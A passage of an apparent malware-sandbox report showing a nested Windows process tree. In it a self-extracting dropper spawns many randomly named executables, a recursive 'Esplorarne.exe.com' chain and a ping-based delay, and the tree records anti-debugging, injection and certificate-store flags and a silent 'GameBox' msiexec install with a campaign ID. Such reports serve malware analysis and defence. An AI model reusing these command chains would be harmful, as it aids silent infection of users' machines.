                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                              15⤵
                                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                                              PID:5268
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                16⤵
                                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                                PID:7388
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                  17⤵
                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                  PID:5112
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                    18⤵
                                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                                    PID:5572
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                      19⤵
                                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                                      PID:7536
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                        20⤵
                                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                                        PID:7476
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                          21⤵
                                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                                          PID:4928
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                            22⤵
                                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                                            PID:4660
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                              23⤵
                                                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                                                              PID:5424
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                24⤵
                                                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                                                PID:4552
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                  25⤵
                                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                                  PID:7308
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                    26⤵
                                                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                                                    PID:7876
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                      27⤵
                                                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                                                      PID:7568
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                        28⤵
                                                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                                                        PID:3172
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                          29⤵
                                                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                                                          PID:7292
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                            30⤵
                                                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                                                            PID:5720
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                              31⤵
                                                                                                                                                                                                PID:3664
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                  32⤵
                                                                                                                                                                                                    PID:5652
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                      33⤵
                                                                                                                                                                                                        PID:5892
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                          34⤵
                                                                                                                                                                                                            PID:7840
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                              35⤵
                                                                                                                                                                                                                PID:5700
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                  36⤵
                                                                                                                                                                                                                    PID:4808
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                      37⤵
                                                                                                                                                                                                                        PID:5436
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                          38⤵
                                                                                                                                                                                                                            PID:6564
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                              39⤵
                                                                                                                                                                                                                                PID:4532
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                  40⤵
                                                                                                                                                                                                                                    PID:1672
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                      41⤵
                                                                                                                                                                                                                                        PID:6076
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                          42⤵
                                                                                                                                                                                                                                            PID:5376
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                              43⤵
                                                                                                                                                                                                                                                PID:5504
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                  44⤵
                                                                                                                                                                                                                                                    PID:6208
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                      45⤵
                                                                                                                                                                                                                                                        PID:5964
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                          46⤵
                                                                                                                                                                                                                                                            PID:5596
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                              47⤵
                                                                                                                                                                                                                                                                PID:8076
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                  48⤵
                                                                                                                                                                                                                                                                    PID:7784
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                      49⤵
                                                                                                                                                                                                                                                                        PID:1012
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                          50⤵
                                                                                                                                                                                                                                                                            PID:1204
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                              51⤵
                                                                                                                                                                                                                                                                                PID:6296
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                  52⤵
                                                                                                                                                                                                                                                                                    PID:1672
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                      53⤵
                                                                                                                                                                                                                                                                                        PID:5168
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                          54⤵
                                                                                                                                                                                                                                                                                            PID:7192
                                                                                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                  ping YJTUIPJF -n 30
                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                                  PID:6356
                                                                                                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
                                                                                                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
                                                                                                                                                                                          5⤵
                                                                                                                                                                                            PID:5868
                                                                                                                                                                                            • C:\Users\Admin\Documents\B0CQ5SSDrVjSYrrdx5SAAaUx.exe
                                                                                                                                                                                              "C:\Users\Admin\Documents\B0CQ5SSDrVjSYrrdx5SAAaUx.exe"
                                                                                                                                                                                              6⤵
                                                                                                                                                                                                PID:6908
                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 6908 -s 296
                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                  PID:7332
                                                                                                                                                                                              • C:\Users\Admin\Documents\5V0WTCy0O8xinaPvkmASVhmC.exe
                                                                                                                                                                                                "C:\Users\Admin\Documents\5V0WTCy0O8xinaPvkmASVhmC.exe"
                                                                                                                                                                                                6⤵
                                                                                                                                                                                                  PID:6368
                                                                                                                                                                                                • C:\Users\Admin\Documents\HtcEPT7apNDlihZBdtu7IBSU.exe
                                                                                                                                                                                                  "C:\Users\Admin\Documents\HtcEPT7apNDlihZBdtu7IBSU.exe"
                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                    PID:6872
                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 6872 -s 276
                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                                                      PID:4388
                                                                                                                                                                                                  • C:\Users\Admin\Documents\IXtp2zp2GOZkPmwWE7TnWQ2U.exe
                                                                                                                                                                                                    "C:\Users\Admin\Documents\IXtp2zp2GOZkPmwWE7TnWQ2U.exe"
                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                    PID:6972
                                                                                                                                                                                                  • C:\Users\Admin\Documents\rKZ4sDNzUPBA2o0WQvxVvxm6.exe
                                                                                                                                                                                                    "C:\Users\Admin\Documents\rKZ4sDNzUPBA2o0WQvxVvxm6.exe"
                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                      PID:7164
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 7164 -s 276
                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                                                                        PID:2448
                                                                                                                                                                                                    • C:\Users\Admin\Documents\Iwk2kobOebHl54rtW4QGgzuj.exe
                                                                                                                                                                                                      "C:\Users\Admin\Documents\Iwk2kobOebHl54rtW4QGgzuj.exe"
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                        PID:5004
                                                                                                                                                                                                      • C:\Users\Admin\Documents\MdY14VtFHNZ_PjA2vpB8u__0.exe
                                                                                                                                                                                                        "C:\Users\Admin\Documents\MdY14VtFHNZ_PjA2vpB8u__0.exe"
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                          PID:6300
                                                                                                                                                                                                        • C:\Users\Admin\Documents\NrLHo9tG1gqwNaz2XqyB5hGB.exe
                                                                                                                                                                                                          "C:\Users\Admin\Documents\NrLHo9tG1gqwNaz2XqyB5hGB.exe"
                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                            PID:5456
                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5456 -s 240
                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                                                              • Enumerates system info in registry
                                                                                                                                                                                                              PID:5868
                                                                                                                                                                                                          • C:\Users\Admin\Documents\CNcEUv2TbkTbUPUSHSsSqluD.exe
                                                                                                                                                                                                            "C:\Users\Admin\Documents\CNcEUv2TbkTbUPUSHSsSqluD.exe"
                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                              PID:1620
                                                                                                                                                                                                              • C:\Users\Admin\Documents\CNcEUv2TbkTbUPUSHSsSqluD.exe
                                                                                                                                                                                                                "C:\Users\Admin\Documents\CNcEUv2TbkTbUPUSHSsSqluD.exe"
                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                                                                PID:3580
                                                                                                                                                                                                            • C:\Users\Admin\Documents\o1znEnhR_eqR_jBMOGVJThBy.exe
                                                                                                                                                                                                              "C:\Users\Admin\Documents\o1znEnhR_eqR_jBMOGVJThBy.exe"
                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                                                              • Enumerates system info in registry
                                                                                                                                                                                                              PID:6088
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\3509006.exe
                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\3509006.exe"
                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                  PID:6348
                                                                                                                                                                                                                  • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                    C:\Windows\system32\WerFault.exe -u -p 6348 -s 2336
                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                                                                                    PID:4804
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\3326600.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\3326600.exe"
                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                  • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                                  PID:4140
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\1547349.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\1547349.exe"
                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                    PID:7428
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\2080048.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\2080048.exe"
                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                      PID:7356
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 7356 -s 2416
                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                                                                                        PID:1536
                                                                                                                                                                                                                  • C:\Users\Admin\Documents\qNmi77UKAji7m2EjxUH0PNTw.exe
                                                                                                                                                                                                                    "C:\Users\Admin\Documents\qNmi77UKAji7m2EjxUH0PNTw.exe"
                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                      PID:2768
                                                                                                                                                                                                                    • C:\Users\Admin\Documents\ZPcGMik0aKWyKrL1UknGr7b9.exe
                                                                                                                                                                                                                      "C:\Users\Admin\Documents\ZPcGMik0aKWyKrL1UknGr7b9.exe"
                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                      PID:6976
                                                                                                                                                                                                                    • C:\Users\Admin\Documents\pYpFJw9oVOIjZXP2g9IWmrxv.exe
                                                                                                                                                                                                                      "C:\Users\Admin\Documents\pYpFJw9oVOIjZXP2g9IWmrxv.exe"
                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                      PID:6136
                                                                                                                                                                                                                    • C:\Users\Admin\Documents\mIy1Ze35wWyM0PnfHHKk1619.exe
                                                                                                                                                                                                                      "C:\Users\Admin\Documents\mIy1Ze35wWyM0PnfHHKk1619.exe"
                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                        PID:1944
                                                                                                                                                                                                                      • C:\Users\Admin\Documents\y4CVm6N5tL9nuZXgdBN43lqW.exe
                                                                                                                                                                                                                        "C:\Users\Admin\Documents\y4CVm6N5tL9nuZXgdBN43lqW.exe"
                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                        PID:824
                                                                                                                                                                                                                      • C:\Users\Admin\Documents\hbLeL4NgFTJuS5T36xTYtjKi.exe
                                                                                                                                                                                                                        "C:\Users\Admin\Documents\hbLeL4NgFTJuS5T36xTYtjKi.exe"
                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                          PID:3052
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3052 -s 320
                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                                                                            • Enumerates system info in registry
                                                                                                                                                                                                                            PID:7952
                                                                                                                                                                                                                        • C:\Users\Admin\Documents\0HtayODMDkMcLyk_gKGyCQHA.exe
                                                                                                                                                                                                                          "C:\Users\Admin\Documents\0HtayODMDkMcLyk_gKGyCQHA.exe"
                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                                                          PID:7076
                                                                                                                                                                                                                          • C:\Users\Admin\Documents\0HtayODMDkMcLyk_gKGyCQHA.exe
                                                                                                                                                                                                                            C:\Users\Admin\Documents\0HtayODMDkMcLyk_gKGyCQHA.exe
                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                              PID:8076
                                                                                                                                                                                                                          • C:\Users\Admin\Documents\HCOQ6dHkelufsXgo7jh24HnR.exe
                                                                                                                                                                                                                            "C:\Users\Admin\Documents\HCOQ6dHkelufsXgo7jh24HnR.exe"
                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                                                            PID:7060
                                                                                                                                                                                                                            • C:\Users\Admin\Documents\HCOQ6dHkelufsXgo7jh24HnR.exe
                                                                                                                                                                                                                              C:\Users\Admin\Documents\HCOQ6dHkelufsXgo7jh24HnR.exe
                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                PID:8124
                                                                                                                                                                                                                            • C:\Users\Admin\Documents\jowxdUL2hRrqYxJF4BCOeZee.exe
                                                                                                                                                                                                                              "C:\Users\Admin\Documents\jowxdUL2hRrqYxJF4BCOeZee.exe"
                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                PID:7008
                                                                                                                                                                                                                                • C:\Users\Admin\Documents\jowxdUL2hRrqYxJF4BCOeZee.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\jowxdUL2hRrqYxJF4BCOeZee.exe"
                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                  PID:7652
                                                                                                                                                                                                                              • C:\Users\Admin\Documents\MJKtYzwkKwpBoUYTmQ9uVGsS.exe
                                                                                                                                                                                                                                "C:\Users\Admin\Documents\MJKtYzwkKwpBoUYTmQ9uVGsS.exe"
                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                  PID:3252
                                                                                                                                                                                                                                • C:\Users\Admin\Documents\WERYWHE8tNUYNgLyHEqYHwVX.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\WERYWHE8tNUYNgLyHEqYHwVX.exe"
                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                    PID:4404
                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\DPefAMRlcLlFrZhf_NTyjr7M.exe
                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\DPefAMRlcLlFrZhf_NTyjr7M.exe"
                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                      PID:6912
                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\DPefAMRlcLlFrZhf_NTyjr7M.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\DPefAMRlcLlFrZhf_NTyjr7M.exe" -q
                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                          PID:5956
                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\j5q7JB4naFPIB3ps7BHN85JY.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\j5q7JB4naFPIB3ps7BHN85JY.exe"
                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                          PID:6960
                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\YxOXVJ6mBBEMjG6S8cgpFjce.exe
                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\YxOXVJ6mBBEMjG6S8cgpFjce.exe"
                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                          PID:6892
                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\dM6yMcqcQDmdZWKFcVHseyI8.exe
                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\dM6yMcqcQDmdZWKFcVHseyI8.exe"
                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                            PID:5476
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-GTQSD.tmp\dM6yMcqcQDmdZWKFcVHseyI8.tmp
                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-GTQSD.tmp\dM6yMcqcQDmdZWKFcVHseyI8.tmp" /SL5="$B0206,138429,56832,C:\Users\Admin\Documents\dM6yMcqcQDmdZWKFcVHseyI8.exe"
                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                              PID:7196
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-4971L.tmp\Setup.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-4971L.tmp\Setup.exe" /Verysilent
                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                  PID:3992
                                                                                                                                                                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                                                                                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                    • Enumerates connected drives
                                                                                                                                                                                                                                                    • Modifies system certificate store
                                                                                                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                    PID:7900
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                      "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629409788 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                      PID:1416
                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\97Vctn8Dd0qyW2WlKQhzbzmg.exe
